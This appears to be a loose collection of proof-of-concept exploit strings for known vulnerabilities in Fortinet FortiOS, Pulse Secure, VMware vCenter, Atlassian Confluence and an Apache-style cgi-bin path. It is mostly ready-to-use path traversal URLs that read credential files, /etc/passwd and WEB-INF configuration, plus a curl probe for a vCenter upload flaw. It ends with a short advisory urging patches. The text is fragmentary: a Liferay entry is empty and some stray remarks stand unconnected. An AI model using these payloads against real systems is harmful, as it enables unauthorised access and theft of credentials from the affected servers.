Fortinet FortiOS Path Traversal Retrieving plaintext credentials: https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Getting passwd content with Pulse Secure unauthenticated path traversal: https://localhost/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

If you have permission to modify the configuration file, then you already got the machine. How can it be a vulnerability?

POC of Liferay Portal RCE:

A fake CVE. Source:

VMware vCenter Server file upload vulnerability POC If below command response with anything other than 404, the application is vulnerable: curl -X POST "http://HOST:PORT/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "Test_Workaround" -H "Content-Type: application/json" -v 2>&1 | grep HTTP

POCs for Atlassian Confluence Server Arbitrary File Read: 1) http://127.0.0.1/s/123cfx/_/;/WEB-INF/web.xml 2) http://127.0.0.1/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml 3) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties 4) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml https://github.com/ColdFusionX/CVE-2021-26085

PoC: 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

VMware vCenter Server vSphere Client remote code execution Attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy to exploit vulnerability. Therefore future exploitation is likely. Also, this vulnerability exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374